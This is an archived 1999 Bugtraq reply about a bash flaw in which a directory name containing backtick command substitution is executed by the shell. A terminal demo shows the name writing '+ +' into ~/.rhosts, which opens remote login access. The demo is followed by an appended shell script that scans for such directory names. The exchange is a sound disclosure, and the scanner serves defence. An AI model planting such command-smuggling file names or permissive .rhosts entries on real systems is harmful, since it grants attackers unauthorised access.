[10324] in bugtraq


Re: Bash Bug

daemon@ATHENA.MIT.EDU (Guy Cohen)
Thu Apr 22 17:40:47 1999

Date: 	Fri, 23 Apr 1999 00:02:57 +0300
Reply-To: Guy Cohen <guy@SPICE.ORG.IL>
From: Guy Cohen <guy@SPICE.ORG.IL>
To: BUGTRAQ@NETSPACE.ORG
In-Reply-To:  <371e6fd4.13342@crystal.dragonfire.net>; from Andy Church on Wed,
              Apr 21, 1999 at 08:39:48PM -0400

At this (Wed, Apr 21, 1999 at 08:39:48PM -0400) day, Andy Church wrote:
.| >If a user creates a directory with a command like
.| >
.| >mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
.| >
.|      Just to clarify, this only happens if PS1 (the bash prompt) contains
.| \w or \W _and_ a prompt is displayed containing the bogus directory name.
.| This means unattended shell scripts are safe.  As a workaround, use `pwd`
.| in place of \w.
.|

Unfortunately, this is not true. Here is why:
rush:/tmp> bash --version
GNU bash, version 2.03.0(1)-release (i586-pc-linux-gnu)
Copyright 1998 Free Software Foundation, Inc.
rush:/tmp> bash
bash-2.03$ echo $PS1
\s-\v\$
bash-2.03$ cat ~/.rhosts
cat: /export/home/guy/.rhosts: No such file or directory
bash-2.03$ mkdir "\ `echo -e \ "echo + +> ~\57.rhosts\ " > x; source x; rm -f \x\ ` "
bash-2.03$ cd \\\ \ /
bash-2.03$ cat /export/home/guy/.rhosts\
+ +
sh-2.03$


--
Guy Cohen <guy@spice.org.il>
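
A defensive check for the condition shown in this thread, added here as an example and not part of either poster's message: it lists directories whose names contain command-substitution syntax. The function names are hypothetical, and matching `$(` as well as the backtick form seen in the thread is a generalization.

```shell
#!/bin/sh
# Added example (hypothetical helper names, not from the thread).
# Finds directory names that carry command-substitution syntax, the kind
# of name that the thread shows being evaluated by the shell.
# Nothing here evaluates a name; names are only matched and printed.

# is_suspicious_name NAME: succeeds if NAME contains a backtick or "$(".
# Useful for checking a single path, e.g. is_suspicious_name "$PWD".
is_suspicious_name() {
    case $1 in
        *'`'*|*'$('*) return 0 ;;
    esac
    return 1
}

# scan_dirs ROOT: print one line per directory under ROOT whose own name
# contains a backtick or "$(". Non-printable bytes (newlines, escape
# sequences) are shown as "?" so a hostile name cannot forge extra report
# lines or send control codes to the terminal reading the report.
scan_dirs() {
    find "$1" -xdev -type d \( -name '*`*' -o -name '*$(*' \) -exec sh -c '
        for p do
            printf "%s" "$p" | LC_ALL=C tr -c "[:print:]" "?"
            printf "\n"
        done' sh {} +
}

# count_suspicious ROOT: number of matching directories under ROOT.
count_suspicious() {
    scan_dirs "$1" | wc -l | tr -d '[:space:]'
}

# Stand-alone use: sh scan.sh /tmp
if [ "$#" -gt 0 ]; then
    scan_dirs "$1"
fi
```

Run it against world-writable trees such as /tmp before working in them interactively.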
